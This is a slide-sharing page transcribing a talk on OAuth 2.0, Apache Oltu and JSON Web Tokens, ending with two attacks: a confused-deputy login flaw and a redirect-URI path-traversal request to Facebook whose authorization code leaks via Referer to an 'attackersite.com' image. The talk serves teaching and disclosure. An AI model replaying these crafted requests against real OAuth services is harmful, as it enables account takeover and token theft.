oauth hacks
play

OAuth Hacks A Gentle Introduction to OAuth 2.0 and Apache Oltu - PowerPoint PPT Presentation

Sep 05, 2022 •436 likes •869 views

OAuth Hacks A Gentle Introduction to OAuth 2.0 and Apache Oltu Antonio Sanso (@asanso) Software Engineer Adobe Research Switzerland Who is this guy, BTW? eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9 .eyJhdWQiOiJjb25uZWN0MjAxNCIsImlzc

  1. OAuth Hacks A Gentle Introduction to OAuth 2.0 and Apache Oltu Antonio Sanso (@asanso) Software Engineer Adobe Research Switzerland

  2. Who is this guy, BTW? eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9 .eyJhdWQiOiJjb25uZWN0MjAxNCIsImlzc yI6ImFzYW5zbyIsInN1YiI6ImFzYW5zbyI sImV4cCI6MTQwMzYwMTU1OSwiaWF0 IjoxNDAzNjAxNTU5fQ.9- MaGUiPg07ezuP9yAOaVLETQH6HMOp foGwg_c0-PDw

  3. Who is this guy, BTW? { Software Engineer Adobe Research Switzerland { VP (Chair) Apache Oltu (OAuth Protocol Implementation in Java) { Committer and PMC Member for Apache Sling { Google Security Hall of Fame, Facebook Security Whitehat, GitHub Security Bug Bounty

  4. My (little) contribution to OAuth Not an RFC, still in the draft phase

  5. ★ Agenda { Introducing OAuth 2.0 { The “OAuth dance” { Introducing Apache Oltu { Implementing OAuth 2.0 { OAuth 2.0 Implementation Vulnerabilities { OAuth 2.0 server to server

  6. Why OAuth? Several web sites offer you the chance to import the list of your contacts. It ONLY requires you giving your username and password. HOW NICE

  7. A bit of history – OAuth 1.0a

  8. A bit of history – OAuth 2.0 X 2 years

  9. The good { OAuth 2.0 is easier to use and implement (compared to OAuth 1.0) { Wide spread and continuing growing { Short lived Tokens { Encapsulated Tokens * Image taken from the movie "The Good, the Bad and the Ugly"

  10. The bad { No signature (relies solely on SSL/TLS ), Bearer Tokens { No built-in security { Can be dangerous if used from not experienced people { Burden on the client * Image taken from the movie "The Good, the Bad and the Ugly"

  11. The ugly { Too many compromises. Working group did not take clear decisions { Oauth 2.0 spec is not a protocol, it is rather a framework - RFC 6749 : The OAuth 2.0 Authorization Framework { Not interoperable - from the spec: “ …this specification is likely to produce a wide range of non-interoperable implementations. ” !! { Mobile integration (web views) { A lot of FUD * Image taken from the movie "The Good, the Bad and the Ugly"

  12. So what should I use? { No many alternatives { OAuth 1.0 does not scale (and it is complicated)

  13. OAuth flows { Authorization Code Grant (aka server side flow) ✓ { Implicit Grant (aka Client side flow) ✓ { Resource Owner Password Credentials Grant { Client Credentials Grant

  14. OAuth Actors { Resource Owner (Alice) { Client (Bob, worker at www.printondemand.biz ) www.printondemand.biz { Server (Carol from Facebook)

  15. ★ Traditional OAuth “dance” - Authorization Code Grant aka server side flow 2. Printondemand wants an Authz Code 3. Login and authorize 4. Here the Authz Code 1. I want 5. Here an Authz we go Code Authorization: Bearer 1017097752d5f18f716cc90ac8a5e4c2a9ace6b9 www.printondemand.biz

  16. ★ Traditional OAuth “dance” #2- client side flow 2. Printondemand wants an Access Token 1616 3. Login and authorize 4. Here the Access Token 1. I want 5. Here an Access we go Token www.printondemand.biz

  17. Apache Oltu { 2010 - Project enters incubation with the name of Apache Amber { 2013 - Amber graduates from the incubator with the name Apache Oltu { OAuth protocol implementation in Java (OAuth client and server) { It also covers others "OAuth family" related implementations such as JWT, JWS

  18. How difficult is to implement OAuth ? OAuth client OAuth server

  19. ★ Traditional OAuth “dance” - Authorization Code Grant aka server side flow 2. Printondemand wants an Authz Code 3. Here the Authz Code Authorization Server 1. I want 4. Here an Authz we go GET /oauth/authorize?response_type=code& Code client_id=bfq5abhdq4on33igtmd74ptrli-9rci_8_9& scope=profile&state=0f9c0d090e74c2a136e41f4a97ed46d29bc9b0251 &redirect_uri=https%3A%2F%2Fwww.printondemand.biz%2Fcallback HTTP/1.1 Host: server.oltu.com www.printondemand.biz

  20. ★ Traditional OAuth “dance” - Authorization Code Grant aka server side flow 2. Printondemand wants an Authz Code 3. Here the Authz Code Authorization Server 1. I want 4. Here an Authz we go HTTP/1.1 302 Found Code Location: https://www.printondemand.biz/callback? code=SplxlOBeZQQYbYS6WxSbIA www.printondemand.biz

  21. ★ Traditional OAuth “dance” - Authorization Code Grant aka server side flow 2. Printondemand wants an Authz Code 3. Here the Authz Code Authorization Server 1. I want 4. Here an Authz we go Code www.printondemand.biz

  22. ★ Traditional OAuth “dance” - Authorization Code Grant aka server side flow Authorization Server POST /oauth/token HTTP/1.1 Host: server.oltu.com Authorization: Basic czZCaGRSa3F0MzpnWDFmQmF0M2JW Content-Type: application/x-www-form-urlencoded grant_type=authorization_code&code=SplxlOBeZQQYbYS6WxSbIA &state=0f9c0d090e74c2a136e41f4a97ed46d29bc9b0251& www.printondemand.biz redirect_uri=https%3A%2F%2Fwww.printondemand.biz%2Fcallback

  23. ★ Traditional OAuth “dance” - Authorization Code Grant aka server side flow Authorization Server HTTP/1.1 200 OK Content-Type: application/json;charset=UTF-8 { "access_token":" 1017097752d5f18f716cc90ac8a5e4c2a9ace6b9 ”, www.printondemand.biz "expires_in":3600 }

  24. ★ Traditional OAuth “dance” - Authorization Code Grant aka server side flow Authorization Server www.printondemand.biz

  25. ★ Traditional OAuth “dance” - Authorization Code Grant aka server side flow Resource Server GET /profile/me HTTP/1.1 Host: server.oltu.com www.printondemand.biz Authorization: Bearer 1017097752d5f18f716cc90ac8a5e4c2a9ace6b9

  26. ★ Traditional OAuth “dance” - Authorization Code Grant aka server side flow Resource Server www.printondemand.biz

  27. Bearer Token Authorization: Bearer 1017097752d5f18f716cc90ac8a5e 4c2a9ace6b9

  28. Scalable OAuth Server { derive encryption key using salt 1 { derive mac key using salt 2 { generate random iv { encrypt. then mac(salt 1 + iv + data) { transmit salt 1, salt 2 iv and encrypted

  29. ★ JSON Web Token eyJhbGciOiJIUzI1NiIsI Header {"alg":"HS256","typ":"JWT"} nR5cCI6IkpXVCJ9. eyJhdWQiOiJjb25uZ WN0MjAxNCIsImlzcyI 6ImFzYW5zbyIsInN1Y {"aud": "jug2015","iss": "oltu","sub":"asanso","exp": iI6ImFzYW5zbyIsImV Claims 1403601559,"iat":1403601559} 4cCI6MTQwMzYwMT U1OSwiaWF0IjoxNDA zNjAxNTU5fQ.MaGUi Pg07ezuP9yAOaVLE Signature HMAC TQH6HMOpfoGwg_c0 -PDw

  30. JSON Web Token

  31. ★ OAuth entication orization { OAuth 2.0 is NOT an authentication protocol. It is an access delegation protocol. { It can-be-used as an authentication protocol { BUT HANDLE WITH CARE

  32. Attack #1 “confused deputy” aka “The Devil Wears Prada” 2. Printondemand wants an Access Token 3. Login and authorize 4. Here the Access Token 1. I want 5. Here an Access we go Token N.B. www.printondemand.biz does not have any security. They have not Authenticated the User! 7. www.printondemand.biz uses the profile information from Facebook to log in www.printondemand.biz * Image taken from the movie "The Devil Wears Prada"

  33. Attack #1 “confused deputy” aka “The Devil Wears Prada” 2. Printondemand wants an Access Token 3. Login and authorize 4. Here the Access Token 1. I want 5. Here an Access we go Token What does this tell us ? That www.printondemand.biz authenticated us, given an Access Token 7. AUTHENTICATED www.printondemand.biz * Image taken from the movie "The Devil Wears Prada"

  34. Attack #1 “confused deputy” aka “The Devil Wears Prada” ★ 3. Login and authorize 4. Here the Access Token b. Give me the 1. I want 5. Here profile an Access we go information, here Token is the Access Token c. AUTHENTICATED a. Here we go www.printondemand.biz www.dosomething.biz * Image taken from the movie "The Devil Wears Prada"

  35. Attack #2 – Exploit the redirect URI aka “ Lassie Come Home” 2. Printondemand wants an Access Token ✔ 1. I want GET /oauth/authorize? an Access response_type=code&client_id=213814055461514&redirect_uri= https%3A%2F ✔ ✔ Token ✗ %2Fgist.github.com%2Fauth%2Ffacebook%2Fcallback Host: https://graph.facebook.com ✗ ✗ ✗ ✗ * Image taken from the movie “Lassie Come Home"

  36. Attack #2 – Exploit the redirect URI aka “ Lassie Come Home” 2. Printondemand wants an Access Token 1. I want an Access Token GET /oauth/authorize? response_type=code&client_id=213814055461514&redirect_uri= https%3A%2F %2Fgist.github.com%2Fauth%2Ffacebook%2Fcallback%2F.\.\../.\.\../.\.\../ ✔ asanso/a2f05bb7e38ba6af88f8 Host: https://graph.facebook.com * Image taken from the movie “Lassie Come Home"

  37. Attack #2 – Exploit the redirect URI aka “ Lassie Come Home” 2. Printondemand wants an Access Token HTTP/1.1 302 Found Location: https://gist.github.com/auth/asanso/ a2f05bb7e38ba6af88f8?code=SplxlOBeZQQYbYS6WxSbIA 1. I want https://gist.github.com/auth/asanso/a2f05bb7e38ba6af88f8 an Access Token ... <img src="http://attackersite.com/"> ... GET / HTTP/1.1 Host: attackersite.com Referer: https://gist.github.com/auth/asanso/a2f05bb7e38ba6af88f8 ?code=SplxlOBeZQQYbYS6WxSbIA * Image taken from the movie “Lassie Come Home"

Recommend

OAuth 2.0 Weina Ma Weina.Ma@uoit.ca Agenda OAuth overview Simple example OAuth

OAuth 2.0 Weina Ma Weina.Ma@uoit.ca Agenda OAuth overview Simple example OAuth

OAuth 2.0 Weina Ma Weina.Ma@uoit.ca Agenda OAuth overview Simple example OAuth protocol workflow Server-side web application flow Client-side web application flow Whats the problem As the web grows, more and more sites

786 views • 45 slides
Wherefore Art Thou, OAuth? 1 What is OAuth? 2 What is OAuth? Your Valet Key for the Web 2

Wherefore Art Thou, OAuth? 1 What is OAuth? 2 What is OAuth? Your Valet Key for the Web 2

Wherefore Art Thou, OAuth? 1 What is OAuth? 2 What is OAuth? Your Valet Key for the Web 2 What is OAuth? Your Valet Key for the Web Delegated Authentication Protocol 2 What is OAuth? Your Valet Key for the Web Delegated Authentication

357 views • 33 slides
7 hacks. 7 time-saving hacks for course coordination associate professor bronwyn lea Hi there!

7 hacks. 7 time-saving hacks for course coordination associate professor bronwyn lea Hi there!

7 hacks. 7 time-saving hacks for course coordination associate professor bronwyn lea Hi there! Here are seven hacks I use to preserve my time and sanity when coordinating large courses. Most are work-arounds that I dream will one day be

342 views • 23 slides
OAuth 2.0 for Browser Based Apps OAuth Security Workshop 2019 David Waite, Principal Technical

OAuth 2.0 for Browser Based Apps OAuth Security Workshop 2019 David Waite, Principal Technical

OAuth 2.0 for Browser Based Apps OAuth Security Workshop 2019 David Waite, Principal Technical Architect, Ping Identity Purpose Best Current Practices Document Builds mostly on RFC 8252 - OAuth 2.0 for Native Apps I-D

386 views • 10 slides
OAuth 2.0 Authorization Server Discovery Metadata draft-ietf-oauth-discovery Mike Jones IETF

OAuth 2.0 Authorization Server Discovery Metadata draft-ietf-oauth-discovery Mike Jones IETF

* OAuth 2.0 Authorization Server Discovery Metadata draft-ietf-oauth-discovery Mike Jones IETF 95, Buenos Aires April 2016 1 Document Status Current draft addresses WGLC feedback See

423 views • 8 slides
Workplace Wellbeing &amp; Delivery Hacks Tuesday 20 September 2016 John Williams Melanie

Workplace Wellbeing &amp; Delivery Hacks Tuesday 20 September 2016 John Williams Melanie

Workplace Wellbeing &amp; Delivery Hacks Tuesday 20 September 2016 John Williams Melanie Woolcott Sam Addison Workspace Hacks 1 #Hacks? Hack /hak/ Verb 1. Cut with rough or heavy blows 2. Gain unauthorised access to date in a

679 views • 51 slides
OAuth 2.0 Security Reinforced Torsten Lodderstedt @tlodderstedt Daniel Fett @dfett42 yes.com

OAuth 2.0 Security Reinforced Torsten Lodderstedt @tlodderstedt Daniel Fett @dfett42 yes.com

OAuth 2.0 Security Reinforced Torsten Lodderstedt @tlodderstedt Daniel Fett @dfett42 yes.com AG The OAuth 2.0 Success Story Tremendous adoption since publication in 2012 Driven by large service providers and OpenID Connect

594 views • 30 slides
OAuth 2.0 D emonstration of P roof- o f- P ossession at the Application Layer ( DPoP ) IETF 106

OAuth 2.0 D emonstration of P roof- o f- P ossession at the Application Layer ( DPoP ) IETF 106

draft-fett-oauth-dpop-03 OAuth 2.0 D emonstration of P roof- o f- P ossession at the Application Layer ( DPoP ) IETF 106 Singapore Nov 2019 Brian Campbell (presenter, co-author, workation photographer) John Bradley (co-author of sorts) Torsten

407 views • 19 slides
Authorization for IoT using OAuth draft-seitz-ace-oauth-authz-00 Ludwig Seitz (ludwig@sics.se)

Authorization for IoT using OAuth draft-seitz-ace-oauth-authz-00 Ludwig Seitz (ludwig@sics.se)

Authorization for IoT using OAuth draft-seitz-ace-oauth-authz-00 Ludwig Seitz (ludwig@sics.se) Gran Selander (goran.selander@ericsson.com) Erik Wahlstrm (erik.wahlstrom@nexusgroup.com) Samuel Erdtman (samuel.erdtman@nexusgroup.com) Hannes

147 views • 10 slides
Identity Management Hannes Tschofenig Motivation OAuth was created to allow secure and

Identity Management Hannes Tschofenig Motivation OAuth was created to allow secure and

Identity Management Hannes Tschofenig Motivation OAuth was created to allow secure and privacy friendly sharing of data. OAuth is not an authentication protocol. Works with any user authentication protocol (e.g., OATH, FIDO, W3C

613 views • 10 slides
Browser Support for the Open Authoriza4on (OAuth) Protocol

Browser Support for the Open Authoriza4on (OAuth) Protocol

Browser Support for the Open Authoriza4on (OAuth) Protocol hGp://www.w3.org/2011/iden4ty-ws/papers/idbrowser2011_submission_32.pdf Hannes Tschofenig, Barry Leiba, Blaine Cook,

434 views • 8 slides
The SciTokens Authorization Model: JSON Web Tokens &amp; OAuth Jim Basney

The SciTokens Authorization Model: JSON Web Tokens &amp; OAuth Jim Basney

The SciTokens Authorization Model: JSON Web Tokens &amp; OAuth Jim Basney &lt;jbasney@ncsa.Illinois.edu&gt; Brian Bockelman &lt;bbockelm@cse.unl.edu&gt; This material is based upon work supported by the National S cience Foundation under Grant

379 views • 20 slides
&amp; 1st large scale oauth stealing botnet &amp; Secure delegation mechanism De-facto

&amp; 1st large scale oauth stealing botnet &amp; Secure delegation mechanism De-facto

&amp; 1st large scale oauth stealing botnet &amp; Secure delegation mechanism De-facto authentication standard &amp; &amp; Exploit server Play store fake install/comments Ads injection Repacked (non-google) app Registration

717 views • 55 slides
Raspberry Pi Hacks Presented by Ruth Suehle T om Callaway @suehle

Raspberry Pi Hacks Presented by Ruth Suehle T om Callaway @suehle

Raspberry Pi Hacks Presented by Ruth Suehle T om Callaway @suehle @spotrh The history of the RasPi Early 2006 concept based on Atmel ATmega644 Designed for educational use Intended for Python (but of course is

1.82k views • 68 slides
Raspberry Pi Hacks Presented by Ruth Suehle T om Callaway @suehle

Raspberry Pi Hacks Presented by Ruth Suehle T om Callaway @suehle

Raspberry Pi Hacks Presented by Ruth Suehle T om Callaway @suehle @spotrh The history of the RasPi Early 2006 concept based on Atmel ATmega644 Designed for educational use Intended for Python (but of course is

939 views • 79 slides
12 Apps &amp; Hacks To Level-Up Y our Next Presentation Or Pitch by Ryan Jenkins Being a

12 Apps &amp; Hacks To Level-Up Y our Next Presentation Or Pitch by Ryan Jenkins Being a

12 Apps &amp; Hacks To Level-Up Y our Next Presentation Or Pitch by Ryan Jenkins Being a paid professional keynote speaker, I typically get two reactions when people ask what I do. The first is shock because peoples #1 fear is public

267 views • 7 slides
An open protocol to allow secure authorization in a simple and standard method from web, mobile

An open protocol to allow secure authorization in a simple and standard method from web, mobile

An open protocol to allow secure authorization in a simple and standard method from web, mobile and desktop applications. OAuth 2.0 Definition Why is this relevant for IXP operators? OAuth 2.0 Roles The resource owner is the user - you

523 views • 29 slides
A Formal Model for Delegated Authorization of IoT Devices Using ACE-OAuth LUCA ARNABOLDI, Newcastle

A Formal Model for Delegated Authorization of IoT Devices Using ACE-OAuth LUCA ARNABOLDI, Newcastle

A Formal Model for Delegated Authorization of IoT Devices Using ACE-OAuth LUCA ARNABOLDI, Newcastle University, UK HANNES TSCHOFENIG, Arm Limited, UK As our daily lives become ever more connected, the need for security becomes more important. This

164 views • 13 slides
IBF Marketing Lifecycle 4. Customer Management Michael Stimson Or: What really hacks off your

IBF Marketing Lifecycle 4. Customer Management Michael Stimson Or: What really hacks off your

IBF Marketing Lifecycle 4. Customer Management Michael Stimson Or: What really hacks off your customers? Build Your Buyer Persona What are the biggest problems they are trying to solve? What does he or she need most? What information

778 views • 24 slides
Federated Iden*ty for IoT with OAuth Paul Fremantle CTO,

Federated Iden*ty for IoT with OAuth Paul Fremantle CTO,

Federated Iden*ty for IoT with OAuth Paul Fremantle CTO, WSO2 (paul@wso2.com) PhD researcher, Portsmouth University (paul.fremantle@port.ac.uk) @pzfreo How

419 views • 21 slides
OpenID Connect &amp; OAuth 2.0 Server for the Enterprise Your enterprise server for single

OpenID Connect &amp; OAuth 2.0 Server for the Enterprise Your enterprise server for single

OpenID Connect &amp; OAuth 2.0 Server for the Enterprise Your enterprise server for single identity sign-on provision identity API access federation management The four Connect2id server pillars Based on the latest standards OpenID

580 views • 26 slides
Animation Techniques in Astronomy aka a Smorgasbord of Data Management, Coding Hacks and

Animation Techniques in Astronomy aka a Smorgasbord of Data Management, Coding Hacks and

Animation Techniques in Astronomy aka a Smorgasbord of Data Management, Coding Hacks and Stuff Ive Been Working on in Houdini/Blender/VR in the context of the larger problems we face in Astronomy Who Are you? Jill P. Naiman NSF+ITC

878 views • 59 slides
Visual Hacks Henrik I. Christensen Robotics and Intelligent Machines @ GT College of Computing

Visual Hacks Henrik I. Christensen Robotics and Intelligent Machines @ GT College of Computing

Introduction Imaging Geometry Features Feature Description Recognition Wrap-up Visual Hacks Henrik I. Christensen Robotics and Intelligent Machines @ GT College of Computing Georgia Institute of Technology Atlanta, GA hic@cc.gatech.edu

388 views • 10 slides
5 CRM-hacks that optimize your productivity! Dynamics 365! mscrm-addons.com is ready! Are you?

5 CRM-hacks that optimize your productivity! Dynamics 365! mscrm-addons.com is ready! Are you?

5 CRM-hacks that optimize your productivity! Dynamics 365! mscrm-addons.com is ready! Are you? ActivityTools Advanced activity-Handling in Dynamics 365: Outlook-like visualization Control: Activity-Preview to be placed on entity forms.

557 views • 6 slides

More recommend